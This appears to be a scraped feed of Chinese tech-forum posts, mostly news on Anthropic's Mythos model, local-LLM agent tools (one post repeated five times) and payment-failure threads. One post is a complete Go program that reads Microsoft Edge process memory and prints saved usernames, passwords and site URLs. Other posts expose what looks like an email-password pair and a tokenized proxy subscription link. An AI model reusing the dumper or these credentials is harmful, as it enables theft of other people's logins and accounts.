主要是给觉得额度不够的佬来兑换的 LD士多 缘散公益站10余额兑换码 - LD士多 缘散公益站兑换码 主站:https://yuansan.qzz.io 3 个帖子 - 3 位参与者 阅读完整话题
来源 https://www.ftchinese.com/interactive/282207 Anthropic正在帮助美国国家安全局(National Security Agency, NSA)部署其强大的Mythos AI模型,用于进攻性网络行动。尽管该公司仍深陷与五角大楼的法律纠纷,它已将工程师派驻到该机构内部。 两名了解相关安排的人士表示,这家总部位于旧金山的公司已在NSA内部部署了约六名员工,担任所谓“前沿部署工程师”,以指导该技术的使用,并针对特定应用定制模型。 目前尚不清楚Anthropic的工程师是否正在协助NSA开展实际行动。不过,一名接近相关情况的人士表示,Mythos将有助于渗透中国或伊朗等国家的网络。 一名接近 Anthropic 的人士表示:“建立良好防御的最佳方式,就是建立强有力的进攻。”这名人士认为,对手很可能也在研发由AI驱动的进攻性科技。 实在气到无话可说了,a÷的嘴脸就是这样的,a÷bitch这一块是拉满了 7 个帖子 - 5 位参与者 阅读完整话题
下载地址: https://drive.google.com/drive/folders/1qDYvycW4Ki0gAppMGhvSixUCioIRXcmN 前俩天我公布了我写的通过本地 LLM 来实现接近 ChatGPT 功能的工具 Bonsai, 这是我这个系列工具的第二个。 这是一个新的观念,就是可以把所有的浏览器交互都通过本地大模型来实现
下载地址: https://drive.google.com/drive/folders/1qDYvycW4Ki0gAppMGhvSixUCioIRXcmN 前俩天我公布了我写的通过本地 LLM 来实现接近 ChatGPT 功能的工具 Bonsai, 这是我这个系列工具的第二个。 这是一个新的观念,就是可以把所有的浏览器交互都通过本地大模型来实现
Anthropic 正协助美国国家安全局部署 Mythos AI 模型,用于进攻性网络行动。两名知情人士称,公司约有 6 名工程师进驻 NSA,负责指导使用并按具体用途定制模型;目前不清楚他们是否参与正在进行的行动。 这一安排发生在 Anthropic 与美国国防部的诉讼期间。公司曾试图限制政府把 Claude 用于美国公民大规模监控和自主致命无人机,随后被列为“供应链风险”并提起诉讼。Anthropic 还计划把 Mythos 扩展至 15 个国家的 150 家机构。 https://www.ft.com/content/d02d91b3-2636-454e-9442-dc7e69f51815?syn-25a6b1a6=1 3 个帖子 - 3 位参与者 阅读完整话题
我在德州西南医学中心从去年开始开的一门课就是如何利用 Agentic AI 来编写 Harness 为不同的专门领域来服务。 当前随着各大 AI 公司比如 OpenAI Google Anthropic 大幅提高 Token 价格,使用云端的大模型的花费越来越高。但是同时很多用户使用 ChatGPT 这样的工具只是把它当成 Google 一样来用,用来查询信息。完全没有必要花费巨额的 Token 量和花费来使用顶级的 GPT 5.5 或者 Opus 4.8 这样的模型。 鉴于此,我决定使用高效的本地模型结合 Harness 来设定工具和 Memory 来解决这个问题。 (取名 Bonsai 的原因,一部分是因为我和 Stanford 出身的 Prism 实验室有过一些交集 https://prismml.com/ ) 虽然 Anthropic 从来没有公布具体的 Claude Sonnet 的参数量,不过从网上的信息以及我的个人分析推断,这个模型是一个 MoE (Mix of Expert) 模型,它的有效参数 (Active Parameter) 应该在数十 B 左右,总参数在几百 B 左右。 MoE 模型的有效参数是真实的模型推理过程中使用的参数量,总参数量则是这个模型所储备的知识量 (Knowlege)。我的想法是如果是这样,那么使用一款带有 Thinking 能力的 Dense 模型,虽然只有数十 B 的参数量,但如果可以结合 Harness Engineering, 利用针对性的高效工具来弥补模型知识能力的不足,这样的工具如果写成了应该可以在本地替代大部分的 ChatGPT 对于大多数用户的需求。 做为这个想法的第一个专门项目,我决定先公布一个测试版本 Bonsai, 这个 Harness 采用了底层和本机的 Google Chrome 交流,通过编写的多个浏览器交流工具让本地 LLM 使用 Agentic 模式来访问网络, 默认使用的大模型是 Google Gemma 4B, 当然也可以换成 QWen 模型。 (使用 Gemma 模型的原因是在德州的政府部门包括学校中不能使用中国的开源模型) 下载地址: https://drive.google.com/drive/folders/1YUQ3tmcBSLEyBKLi5JdJgmod9mqXFTgl?usp=sharing 截图: https://i.imgur.com/9MacuXk.png 左边是输入对话框,右边是 Agent 在操作浏览器 这个 Harness 采用了很多专门针对浏览器交互的工具,包括可以 InjectJS 等 JS 注入工具,来方便 Agnet 来查找网页元素和点击按钮等等 这个当前的版本是在 Windows 上编译的,需要 Nvidia CUDA 的支持 我会随后更新还在测试中的 M 系列的 Mac 版本 当前使用 4B thinking 模型作为默认模型的目的是可以在本地上跑到快速的 token / s 方便使用 Agentic workflow. 我测试使用的 Win11+Nvidia 4090 可以跑到大概 140 tps. 在 M4 mac 上使用 Metal 后段大概在 50 tps 左右
我在德州西南医学中心从去年开始开的一门课就是如何利用 Agentic AI 来编写 Harness 为不同的专门领域来服务。 当前随着各大 AI 公司比如 OpenAI Google Anthropic 大幅提高 Token 价格,使用云端的大模型的花费越来越高。但是同时很多用户使用 ChatGPT 这样的工具只是把它当成 Google 一样来用,用来查询信息。完全没有必要花费巨额的 Token 量和花费来使用顶级的 GPT 5.5 或者 Opus 4.8 这样的模型。 鉴于此,我决定使用高效的本地模型结合 Harness 来设定工具和 Memory 来解决这个问题。 (取名 Bonsai 的原因,一部分是因为我和 Stanford 出身的 Prism 实验室有过一些交集 https://prismml.com/ ) 虽然 Anthropic 从来没有公布具体的 Claude Sonnet 的参数量,不过从网上的信息以及我的个人分析推断,这个模型是一个 MoE (Mix of Expert) 模型,它的有效参数 (Active Parameter) 应该在数十 B 左右,总参数在几百 B 左右。 MoE 模型的有效参数是真实的模型推理过程中使用的参数量,总参数量则是这个模型所储备的知识量 (Knowlege)。我的想法是如果是这样,那么使用一款带有 Thinking 能力的 Dense 模型,虽然只有数十 B 的参数量,但如果可以结合 Harness Engineering, 利用针对性的高效工具来弥补模型知识能力的不足,这样的工具如果写成了应该可以在本地替代大部分的 ChatGPT 对于大多数用户的需求。 做为这个想法的第一个专门项目,我决定先公布一个测试版本 Bonsai, 这个 Harness 采用了底层和本机的 Google Chrome 交流,通过编写的多个浏览器交流工具让本地 LLM 使用 Agentic 模式来访问网络, 默认使用的大模型是 Google Gemma 4B, 当然也可以换成 QWen 模型。 (使用 Gemma 模型的原因是在德州的政府部门包括学校中不能使用中国的开源模型) 下载地址: https://drive.google.com/drive/folders/1YUQ3tmcBSLEyBKLi5JdJgmod9mqXFTgl?usp=sharing 截图: https://i.imgur.com/9MacuXk.png 左边是输入对话框,右边是 Agent 在操作浏览器 这个 Harness 采用了很多专门针对浏览器交互的工具,包括可以 InjectJS 等 JS 注入工具,来方便 Agnet 来查找网页元素和点击按钮等等 这个当前的版本是在 Windows 上编译的,需要 Nvidia CUDA 的支持 我会随后更新还在测试中的 M 系列的 Mac 版本 当前使用 4B thinking 模型作为默认模型的目的是可以在本地上跑到快速的 token / s 方便使用 Agentic workflow. 我测试使用的 Win11+Nvidia 4090 可以跑到大概 140 tps. 在 M4 mac 上使用 Metal 后段大概在 50 tps 左右
我在德州西南医学中心从去年开始开的一门课就是如何利用 Agentic AI 来编写 Harness 为不同的专门领域来服务。 当前随着各大 AI 公司比如 OpenAI Google Anthropic 大幅提高 Token 价格,使用云端的大模型的花费越来越高。但是同时很多用户使用 ChatGPT 这样的工具只是把它当成 Google 一样来用,用来查询信息。完全没有必要花费巨额的 Token 量和花费来使用顶级的 GPT 5.5 或者 Opus 4.8 这样的模型。 鉴于此,我决定使用高效的本地模型结合 Harness 来设定工具和 Memory 来解决这个问题。 (取名 Bonsai 的原因,一部分是因为我和 Stanford 出身的 Prism 实验室有过一些交集 https://prismml.com/ ) 虽然 Anthropic 从来没有公布具体的 Claude Sonnet 的参数量,不过从网上的信息以及我的个人分析推断,这个模型是一个 MoE (Mix of Expert) 模型,它的有效参数 (Active Parameter) 应该在数十 B 左右,总参数在几百 B 左右。 MoE 模型的有效参数是真实的模型推理过程中使用的参数量,总参数量则是这个模型所储备的知识量 (Knowlege)。我的想法是如果是这样,那么使用一款带有 Thinking 能力的 Dense 模型,虽然只有数十 B 的参数量,但如果可以结合 Harness Engineering, 利用针对性的高效工具来弥补模型知识能力的不足,这样的工具如果写成了应该可以在本地替代大部分的 ChatGPT 对于大多数用户的需求。 做为这个想法的第一个专门项目,我决定先公布一个测试版本 Bonsai, 这个 Harness 采用了底层和本机的 Google Chrome 交流,通过编写的多个浏览器交流工具让本地 LLM 使用 Agentic 模式来访问网络, 默认使用的大模型是 Google Gemma 4B, 当然也可以换成 QWen 模型。 (使用 Gemma 模型的原因是在德州的政府部门包括学校中不能使用中国的开源模型) 下载地址: https://drive.google.com/drive/folders/1YUQ3tmcBSLEyBKLi5JdJgmod9mqXFTgl?usp=sharing 截图: https://i.imgur.com/9MacuXk.png 左边是输入对话框,右边是 Agent 在操作浏览器 这个 Harness 采用了很多专门针对浏览器交互的工具,包括可以 InjectJS 等 JS 注入工具,来方便 Agnet 来查找网页元素和点击按钮等等 这个当前的版本是在 Windows 上编译的,需要 Nvidia CUDA 的支持 我会随后更新还在测试中的 M 系列的 Mac 版本 当前使用 4B thinking 模型作为默认模型的目的是可以在本地上跑到快速的 token / s 方便使用 Agentic workflow. 我测试使用的 Win11+Nvidia 4090 可以跑到大概 140 tps. 在 M4 mac 上使用 Metal 后段大概在 50 tps 左右
我在德州西南医学中心从去年开始开的一门课就是如何利用 Agentic AI 来编写 Harness 为不同的专门领域来服务。 当前随着各大 AI 公司比如 OpenAI Google Anthropic 大幅提高 Token 价格,使用云端的大模型的花费越来越高。但是同时很多用户使用 ChatGPT 这样的工具只是把它当成 Google 一样来用,用来查询信息。完全没有必要花费巨额的 Token 量和花费来使用顶级的 GPT 5.5 或者 Opus 4.8 这样的模型。 鉴于此,我决定使用高效的本地模型结合 Harness 来设定工具和 Memory 来解决这个问题。 (取名 Bonsai 的原因,一部分是因为我和 Stanford 出身的 Prism 实验室有过一些交集 https://prismml.com/ ) 虽然 Anthropic 从来没有公布具体的 Claude Sonnet 的参数量,不过从网上的信息以及我的个人分析推断,这个模型是一个 MoE (Mix of Expert) 模型,它的有效参数 (Active Parameter) 应该在数十 B 左右,总参数在几百 B 左右。 MoE 模型的有效参数是真实的模型推理过程中使用的参数量,总参数量则是这个模型所储备的知识量 (Knowlege)。我的想法是如果是这样,那么使用一款带有 Thinking 能力的 Dense 模型,虽然只有数十 B 的参数量,但如果可以结合 Harness Engineering, 利用针对性的高效工具来弥补模型知识能力的不足,这样的工具如果写成了应该可以在本地替代大部分的 ChatGPT 对于大多数用户的需求。 做为这个想法的第一个专门项目,我决定先公布一个测试版本 Bonsai, 这个 Harness 采用了底层和本机的 Google Chrome 交流,通过编写的多个浏览器交流工具让本地 LLM 使用 Agentic 模式来访问网络, 默认使用的大模型是 Google Gemma 4B, 当然也可以换成 QWen 模型。 (使用 Gemma 模型的原因是在德州的政府部门包括学校中不能使用中国的开源模型) 下载地址: https://drive.google.com/drive/folders/1YUQ3tmcBSLEyBKLi5JdJgmod9mqXFTgl?usp=sharing 截图: https://i.imgur.com/9MacuXk.png 左边是输入对话框,右边是 Agent 在操作浏览器 这个 Harness 采用了很多专门针对浏览器交互的工具,包括可以 InjectJS 等 JS 注入工具,来方便 Agnet 来查找网页元素和点击按钮等等 这个当前的版本是在 Windows 上编译的,需要 Nvidia CUDA 的支持 我会随后更新还在测试中的 M 系列的 Mac 版本 当前使用 4B thinking 模型作为默认模型的目的是可以在本地上跑到快速的 token / s 方便使用 Agentic workflow. 我测试使用的 Win11+Nvidia 4090 可以跑到大概 140 tps. 在 M4 mac 上使用 Metal 后段大概在 50 tps 左右
我在德州西南医学中心从去年开始开的一门课就是如何利用 Agentic AI 来编写 Harness 为不同的专门领域来服务。 当前随着各大 AI 公司比如 OpenAI Google Anthropic 大幅提高 Token 价格,使用云端的大模型的花费越来越高。但是同时很多用户使用 ChatGPT 这样的工具只是把它当成 Google 一样来用,用来查询信息。完全没有必要花费巨额的 Token 量和花费来使用顶级的 GPT 5.5 或者 Opus 4.8 这样的模型。 鉴于此,我决定使用高效的本地模型结合 Harness 来设定工具和 Memory 来解决这个问题。 (取名 Bonsai 的原因,一部分是因为我和 Stanford 出身的 Prism 实验室有过一些交集 https://prismml.com/ ) 虽然 Anthropic 从来没有公布具体的 Claude Sonnet 的参数量,不过从网上的信息以及我的个人分析推断,这个模型是一个 MoE (Mix of Expert) 模型,它的有效参数 (Active Parameter) 应该在数十 B 左右,总参数在几百 B 左右。 MoE 模型的有效参数是真实的模型推理过程中使用的参数量,总参数量则是这个模型所储备的知识量 (Knowlege)。我的想法是如果是这样,那么使用一款带有 Thinking 能力的 Dense 模型,虽然只有数十 B 的参数量,但如果可以结合 Harness Engineering, 利用针对性的高效工具来弥补模型知识能力的不足,这样的工具如果写成了应该可以在本地替代大部分的 ChatGPT 对于大多数用户的需求。 做为这个想法的第一个专门项目,我决定先公布一个测试版本 Bonsai, 这个 Harness 采用了底层和本机的 Google Chrome 交流,通过编写的多个浏览器交流工具让本地 LLM 使用 Agentic 模式来访问网络, 默认使用的大模型是 Google Gemma 4B, 当然也可以换成 QWen 模型。 (使用 Gemma 模型的原因是在德州的政府部门包括学校中不能使用中国的开源模型) 下载地址: https://drive.google.com/drive/folders/1YUQ3tmcBSLEyBKLi5JdJgmod9mqXFTgl?usp=sharing 截图: https://i.imgur.com/9MacuXk.png 左边是输入对话框,右边是 Agent 在操作浏览器 这个 Harness 采用了很多专门针对浏览器交互的工具,包括可以 InjectJS 等 JS 注入工具,来方便 Agnet 来查找网页元素和点击按钮等等 这个当前的版本是在 Windows 上编译的,需要 Nvidia CUDA 的支持 我会随后更新还在测试中的 M 系列的 Mac 版本 当前使用 4B thinking 模型作为默认模型的目的是可以在本地上跑到快速的 token / s 方便使用 Agentic workflow. 我测试使用的 Win11+Nvidia 4090 可以跑到大概 140 tps. 在 M4 mac 上使用 Metal 后段大概在 50 tps 左右
IT之家 5 月 27 日消息,PrismML 昨日(5 月 26 日)发布公告,宣布推出 Bonsai Image 4B 系列图像生成模型, 在 iPhone 17 Pro Max 生成 512×512 图像约需 9.4 秒。 该系列模型分为 1-bit Bonsai Image 4B 与 Ternary Bonsai Image 4B 2 个版本,前者更强调极致压缩,后者在保持小体积的同时,进一步提升画面质量与提示词还原度。 该系列模型基于 FLUX.2 Klein 4B 构建,整体架构保持不变,主要调整集中在扩散 Transformer 的权重表示方式: 1-bit 版本采用二值权重,权重集合为 {−1,+1},配合 FP16 分组缩放后,单权重等效位宽为 1.125bit; Ternary 版本采用三值权重,权重集合为 {−1,0,+1},等效位宽为 1.71bit,因此拥有更高的表示灵活性。 在体积方面,1-bit 版本的二值层相对全精度 Transformer 权重缩小至 14 分之一,最终 Transformer 体积压到 0.93GB,较 7.75GB 的全精度 FLUX.2 Klein 4B 缩小至 8.3 分之一。 运行时内存占用也明显下降。生成 512×512 图像时,1-bit 与 Ternary 版本平均活跃内存分别为 1.5GB 与 1.96GB,全精度 FLUX.2 Klein 4B 则高达 11.74GB。 生成 1024×1024 图像时,这 2 个版本分别为 1.95GB 与 2.38GB,而原模型达到 14.39GB。 速度与效果方面,Bonsai Image 4B 在 iPhone 17 Pro Max 生成 512×512 图像约需 9.4 秒,在 Mac M4 Pro 上约 6 秒;在 Mac M4 Pro 平台,最高可比全精度 MFLUX 流水线快 5.6 倍。 质量评测覆盖 GenEval、HPSv3、DPG-Bench 3 项基准,其中 Ternary 版本在 1.21GB 体积下保留 FLUX.2 Klein 4B 约 95%准确性,1-bit 版本在不足 1GB 的前提下保留约 88%准确性。 IT之家附上参考地址 Introducing 1-bit and Ternary Bonsai Image 4B: Image Generation for Local Devices
看到量子位推了 github.com GitHub - tinyhumansai/openhuman: Your Personal AI super intelligence. Private,... Your Personal AI super intelligence. Private, Simple and extremely powerful. 3 个帖子 - 3 位参与者 阅读完整话题
package main import ( "fmt" "regexp" "strings" "syscall" "unsafe" "github.com/StackExchange/wmi" "golang.org/x/sys/windows" ) const ( PROCESS_QUERY_INFORMATION = 0x0400 PROCESS_VM_READ = 0x0010 MEM_COMMIT = 0x1000 PAGE_READWRITE = 0x04 ) type MEMORY_BASIC_INFORMATION struct { BaseAddress uintptr AllocationBase uintptr AllocationProtect uint32 RegionSize uintptr State uint32 Protect uint32 Type uint32 } type ProcessInfo struct { Id uint32 Name string Owner string } type Win32Process struct { ProcessId uint32 Name string ParentProcessId uint32 } var ( kernel32 = windows.NewLazySystemDLL("kernel32.dll") advapi32 = windows.NewLazySystemDLL("advapi32.dll") procOpenProcess = kernel32.NewProc("OpenProcess") procVirtualQueryEx = kernel32.NewProc("VirtualQueryEx") procReadProcessMemory = kernel32.NewProc("ReadProcessMemory") procCloseHandle = kernel32.NewProc("CloseHandle") procOpenProcessToken = advapi32.NewProc("OpenProcessToken") ) func OpenProcess(dwDesiredAccess uint32, bInheritHandle bool, dwProcessId uint32) (windows.Handle, error) { var inheritHandle uint32 if bInheritHandle { inheritHandle = 1 } handle, _, err := procOpenProcess.Call( uintptr(dwDesiredAccess), uintptr(inheritHandle), uintptr(dwProcessId), ) if handle == 0 { return 0, err } return windows.Handle(handle), nil } func VirtualQueryEx(hProcess windows.Handle, lpAddress uintptr, lpBuffer *MEMORY_BASIC_INFORMATION, dwLength uint32) uintptr { ret, _, _ := procVirtualQueryEx.Call( uintptr(hProcess), lpAddress, uintptr(unsafe.Pointer(lpBuffer)), uintptr(dwLength), ) return ret } func ReadProcessMemory(hProcess windows.Handle, lpBaseAddress uintptr, lpBuffer *byte, nSize uintptr, lpNumberOfBytesRead *uintptr) bool { ret, _, _ := procReadProcessMemory.Call( uintptr(hProcess), lpBaseAddress, uintptr(unsafe.Pointer(lpBuffer)), nSize, uintptr(unsafe.Pointer(lpNumberOfBytesRead)), ) return ret != 0 } func CloseHandle(hObject windows.Handle) bool { ret, _, _ := procCloseHandle.Call(uintptr(hObject)) return ret != 0 } func OpenProcessToken(ProcessHandle windows.Handle, DesiredAccess uint32, TokenHandle *windows.Token) error { ret, _, err := procOpenProcessToken.Call( uintptr(ProcessHandle), uintptr(DesiredAccess), uintptr(unsafe.Pointer(TokenHandle)), ) if ret == 0 { return err } return nil } func GetProcessOwnerFromToken(pid uint32) string { handle, err := OpenProcess(0x1000 /* QUERY_LIMITED_INFORMATION */, false, pid) if err != nil || handle == 0 { return "UNKNOWN" } defer CloseHandle(handle) var token windows.Token err = OpenProcessToken(handle, 8 /* TOKEN_QUERY */, &token) if err != nil { return "UNKNOWN" } defer token.Close() tokenUser, err := token.GetTokenUser() if err != nil { return "UNKNOWN" } accountName, _, _, err := tokenUser.User.Sid.LookupAccount("") if err != nil { return "UNKNOWN" } return accountName } func IsElevated() bool { var sid *windows.SID err := windows.AllocateAndInitializeSid( &windows.SECURITY_NT_AUTHORITY, 2, windows.SECURITY_BUILTIN_DOMAIN_RID, windows.DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &sid, ) if err != nil { return false } defer windows.FreeSid(sid) token := windows.GetCurrentProcessToken() isMember, err := token.IsMember(sid) if err != nil { return false } return isMember } func main() { isElevated := IsElevated() if !isElevated { fmt.Print("\033[31m[x]\033[0m") fmt.Println(" Not running elevated.") fmt.Println("\nProgram will only be able to access Edge processes run by the same user.") fmt.Println("The program might also fail trying to look up owner of some Edge processes.\n") } else { fmt.Print("\033[32m[v]\033[0m") fmt.Println(" Running elevated.\n") } fmt.Print("Fetching browser processes:") totalMatches := 0 shownMatches := 0 seenStrings := make(map[string]struct{}) alreadyCheckedUsers := make(map[string]struct{}) var processes []Win32Process query := "SELECT ProcessId, Name, ParentProcessId FROM Win32_Process WHERE Name='msedge.exe'" err := wmi.Query(query, &processes) if err != nil { fmt.Printf("Error querying WMI: %v\n", err) return } var processList []ProcessInfo for _, proc := range processes { parentPid := proc.ParentProcessId skip := false // Check parent process parentHandle, err := OpenProcess(PROCESS_QUERY_INFORMATION, false, parentPid) if err == nil && parentHandle != 0 { // Get parent process name var exeName [windows.MAX_PATH]uint16 size := uint32(len(exeName)) err = windows.QueryFullProcessImageName(windows.Handle(parentHandle), 0, &exeName[0], &size) if err == nil { name := syscall.UTF16ToString(exeName[:]) if strings.Contains(strings.ToLower(name), "msedge") { skip = true } } CloseHandle(parentHandle) } if skip { continue } processList = append(processList, ProcessInfo{ Id: proc.ProcessId, Name: proc.Name, Owner: GetProcessOwnerFromToken(proc.ProcessId), }) } fmt.Println(" Done.\n") for _, proc := range processList { key := fmt.Sprintf("%s %s", proc.Owner, proc.Name) if _, exists := alreadyCheckedUsers[key]; exists { continue } owner := strings.Replace(proc.Owner, "NSC\\t1_", "", -1) fmt.Printf("Scanning process PID: %d\tName: %s\tOwner: %s\n", proc.Id, proc.Name, owner) processHandle, err := OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ, false, proc.Id) if err != nil || processHandle == 0 { fmt.Printf("Failed to open process: %d %s %s\n", proc.Id, proc.Name, proc.Owner) continue } var address uintptr = 0 var memInfo MEMORY_BASIC_INFORMATION memInfoSize := uint32(unsafe.Sizeof(memInfo)) for VirtualQueryEx(processHandle, address, &memInfo, memInfoSize) != 0 { readable := memInfo.State == MEM_COMMIT && memInfo.Protect == PAGE_READWRITE if readable { buffer := make([]byte, memInfo.RegionSize) var bytesRead uintptr ret, _, _ := procReadProcessMemory.Call( uintptr(processHandle), memInfo.BaseAddress, uintptr(unsafe.Pointer(&buffer[0])), memInfo.RegionSize, uintptr(unsafe.Pointer(&bytesRead)), ) if ret != 0 { utf8 := string(buffer) lines := strings.Split(utf8, "\n") for _, line := range lines { // Pattern for saved passwords pattern := regexp.MustCompile(`[a-zA-Z]https?\x20([a-zA-Z0-9\\\-_\.@\?]{1,20})\x20([a-zA-Z0-9#!@#\$%\^&\*\(\)_\-\+=\{\}\[\]:;<>\?/~\s]{1,40})\x20\x00`) matches := pattern.FindAllStringSubmatch(line, -1) for _, match := range matches { if len(match) < 3 { continue } username := match[1] password := match[2] potentialPattern := fmt.Sprintf("%s : %s", username, password) urlPattern := regexp.MustCompile(fmt.Sprintf(`\x00\x00\x00([A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%%]+)(https?)\x20%s %s`, regexp.QuoteMeta(username), regexp.QuoteMeta(password))) urlMatches := urlPattern.FindAllStringSubmatch(line, -1) for _, urlMatch := range urlMatches { if len(urlMatch) < 2 { continue } value := urlMatch[1] combined := fmt.Sprintf("%s @%s", potentialPattern, value) if _, seen := seenStrings[combined]; !seen { fmt.Println(combined) seenStrings[combined] = struct{}{} shownMatches++ totalMatches++ } } alreadyCheckedUsers[key] = struct{}{} } } } } address = memInfo.BaseAddress + memInfo.RegionSize } CloseHandle(processHandle) } seenStrings = nil fmt.Printf("\nTotal matches found across all processes: %d. %d shown.\n", totalMatches, shownMatches) } 根据EdgeSavedPasswordsDumper(c#) 用AI转的go的 1 个帖子 - 1 位参与者 阅读完整话题
[email protected] SUpg5fQ$Je%9 3 个帖子 - 2 位参与者 阅读完整话题
GoPay貌似拉闸咯,支付已经deney了 { "status_code": "202", "status_message": "Your transaction is denied. Please try again or try another payment method.", "transaction_id": "754", "order_id": "setatt_", "merchant_id": "G76", "gross_amount": "1", "currency": "IDR", "payment_type": "gopay", "transaction_time": "2026-05-08 11:52:26", "transaction_status": "deny", "fraud_status": "deny", "finish_redirect_url": "https://", "finish_200_redirect_url": "https://", "charge_type": "gopay" } 1 个帖子 - 1 位参与者 阅读完整话题
这个问题有佬能解决吗, 这是已经输入支付pin, 看似成功过几秒跳转到这里 1 个帖子 - 1 位参与者 阅读完整话题
https://equaldcdn.com/use/unsafe/sub.php?t=eyJ1dWlkIjoiMjc3RUVBQ0YtMUQxMy00OTQ1LTkwNTQtNkYwREQ2QUZGNUJEIiwic2VydmVyIjoiNjQuMTg2LjIyOS4xNTciLCJwb3J0IjoiNDQzIiwicHVibGljX2tleSI6Ikg2MlVjbmgwWEx4X3FKV0xYN2VNd2NaV0t1OHgwdFZ6Qk11WHNvakV0VFkiLCJzaG9ydF9pZCI6ImJhZGM2OTc5Nzg4ODQ2M2MiLCJzZXJ2ZXJuYW1lIjpudWxsLCJ0b3RhbCI6NjQ0MjQ1MDk0NDAsImV4cGlyZSI6MTc3ODE1MzkwNX0&s=7451077931083c2f967fbea6c2c18b281343e02318c6cac5418f937cd81e0f17 1 个帖子 - 1 位参与者 阅读完整话题
起因很意外,刷到一个 CTF skill 的帖子,想让 GPT-5.4 (Codex) 试试。 把链接发给了它 结果它上来就要在我电脑上装一堆工具,我当时就慌了------ 这要把我电脑搞爆炸怎么办? 况且之后少工具还要配置 然后突然想到:我 VM虚拟机 里有从24年就下下来到现在一直吃灰的Kali,工具按理来说应该是比让他安一堆工具再配置省事很多 所以 为什么不直接让它通过 SSH 用那些工具? 说干就干 照着他给我的教程 配置好了SSH连接 先找了个叫 CAP 的靶机试试水------ 很快啊 ,直接拿下flag。 然后我就飘了。 随手挑了个叫 PingPong 的,看到标注 Insane,完全不知道这意味着什么,就扔给它了 然后挂了一会后台 回来发现他连 SSH 都连不上了 翻了下聊天记录 发现压缩上下文了 把他刚做的流程全部压缩没了 所以我立马让他强制在每轮关键节点写上"日记" 这样一来就完美解决了这个问题 过程我看得云里雾里,但大概是这样: 它先进了一个域,然后发现里面还藏着第二个域……偷了几张门票……进了一个数据库……能直接执行系统命令的开关…… 具体怎么打的我就不说了——靶机还是活跃状态,HTB 规定不能发 writeup 所以就不发出攻击链了 我全程就是个观众,看着命令一条条跑,完全不知道每一步意味着什么。 中途好几次 我都怀疑它是在疯狂吃掉我的token却不干活 因为跑了一大堆 但进度始终没有推进 随后我把它写的日志发给claude帮忙看下 结果claude给出的回复让我有些惊讶 它会自己分析报错,自己换方案,遇到环境崩了就翻日记重建现场继续打。甚至会自己修复靶机故意设置的垃圾环境,并不是我想的重复转圈 疯狂消灭我的token 目前的进度是 拿到了user flag 目前进度是 root 卡在最后一步,MSSQL 登录响应异常,差一扇门没踹开。 它日志里是这么讲的 但从头到尾已经烧掉我50元了 所以现在暂时搁置了 有人试过直接给 AI SSH 权限控制 Kali 打靶机吗?还是说这个玩法早就有人搞过了,只是我没看到? 7 个帖子 - 5 位参与者 阅读完整话题
据一名美国官员和另一名知情人士称,美国国家安全局(NSA)一直在测试Anthropic PBC新的人工智能模型从流行软件中发现网络安全漏洞的能力,其中包括微软的产品。这名官员和这名知情人士表示,研究Mythos模型的美国国家安全局官员对其搜索潜在安全漏洞的速度和效率印象深刻。两人均因未获授权公开讨论此事而要求匿名。 国家安全局是在美国网络间谍活动中居于核心地位的机构,其内部人员所形成的印象进一步表明,已经在华盛顿乃至华尔街的领导层中引发安全担忧的Mythos模型的确威力强大。 Anthropic最初仅向少数机构发布了Mythos,并鼓励它们赶在黑客之前,利用这项技术找出其系统中的软件缺陷。新闻周三报道称,该公司高管在认定黑客可能会利用Mythos后,决定不向公众发布这一模型,而白宫也反对该公司再向大约70家机构提供使用权限的计划。 美国国家安全局和Anthropic的发言人均拒绝置评。 查看评论
本帖使用社区开源推广,符合推广要求。我申明并遵循社区要求的以下内容: 我的帖子已经打上 开源推广 标签: 是 我的开源项目完整开源,无未开源部分: 是 我的开源项目已链接认可 LINUX DO 社区: 是 我帖子内的项目介绍,AI生成、润色内容部分已截图发出: 是 以上选择我承诺是永久有效的,接受社区和佬友监督: 是 以下为项目介绍正文内容,AI生成、润色内容已使用截图方式发出 项目地址 GitHub - LGYoungCoder/bonsai-agent: 一棵被刻意约束的树,才能活上几百年 — 小气但可进化的个人 agent 框架 。 · GitHub 之前朋友问我,他们公司做那种客服agent用小龙虾 实在是太臃肿了,能不能自己做一个。这个跟我的想法不谋而合,我敲代码用codex和cc,基本上小龙虾作为我辅助找资料或者干嘛的手段,太臃肿太消耗token了。 然后我抢了他的ccmax,在帮助他们做的同时,做了这个小智能体,叫bonsai.当然,是ai起的名字。不过现在真有一种在养孩子的感觉。 花了10m左右的cc4.7 做了这个玩意,东拼西凑 让他看到什么玩意好就放上去,比如之前什么很火的生化危机女主角那个记忆系统,还有什么绘画渠道。 我现在是glm codeplan(claude格式)+硅基的嵌入式模型+微信的claw绑定在使用。所以 其他的什么qqbot feishu 百分之90会有bug!!! 就连其他模型配置 我都怀疑有bug.但是只要我有时间,我就去测试和修。 就算是微信 也有bug,不过我看到就修复。还有,,目前甚至都没有走正规的软件流程,(我连dev分支都没创建)。这个bonsai我放在了我的云电脑上 ubuntu让他鼓捣,帮我完成一点助手什么的。 如果大家感兴趣 真的可以试一试呀。 如果有什么想法或者建议 ,俺一条一条的看。 1 个帖子 - 1 位参与者 阅读完整话题